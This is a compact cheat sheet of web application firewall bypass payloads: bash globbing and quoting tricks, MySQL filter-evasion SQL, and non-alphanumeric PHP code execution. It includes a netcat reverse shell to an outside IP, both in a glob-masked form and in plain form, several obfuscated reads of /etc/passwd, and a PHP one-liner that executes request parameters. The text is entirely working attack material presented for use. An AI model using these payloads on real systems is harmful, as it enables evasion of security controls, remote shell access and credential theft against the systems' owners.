Some web application firewall bypasses
Bash globbing
Listing via echo
echo /*Exec masked command
/???/?????/???/n? -e /???/b??h 168048868 1337 &<=>
/ust/local/bin/nc -e /bin/bash 10.4.56.228 1337 &Quote marks
/b'i'n/c'a't /e't'c/pa's's'wd'Using IP address in long form
10.4.56.228 == 168048868Exclude spaces
IFS=,;`cat<<<cat,/etc/passwd`
IFS=,;$(cat<<<cat,/etc/passwd)
cat$IFS/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}MySQL
Whitespaces:
- %0c = form feed, new page
- %09 = horizontal tab
- %0d = carriage return
- %0a = line feed, new line
- %0b
- %a0
SELECT/*some*/1/*some*/FROM/*some*/users
SELECT(1)FROM(information_schema.tables)
x'31'=1
x'31' like 1
0b1010=10
12 rlike 1
('o')rlike('o')
SELECT CHAR(0x66)
SELECT 0x5045
SELECT 0x50 + 0x45SELECT user FROM mysql.user; Comments
SELECT/*sometext*/user FROM mysql/*sometext*/.user; Whitespaces
SEL\nECT user FR\tOM mys\xql.user;Multybyte encodings (SJIS, BIG5, GBK…)
%bf%27 -> escape -> 0xbf5c'
%a3%27 -> escape -> 0xa35c'Comma filter bypass
select 1,2,3 <=> select * from (Select 1)a join(Select 2)b join(Select 3)c;
select 1,2,3 <=> sElecT * froM (sElecT 1) As a JoIn (sElecT 2) aS b JoIn (sElecT 3) AS c;
select substr('hack',1,1);
select substr('hack' from 1 FoR 1);PHP
Use non alphanumeric payloads
$_='$<>/'^'{{{{';${$_}[_](${$_}[__]);
<=>
$_GET['_']($_GET['__']);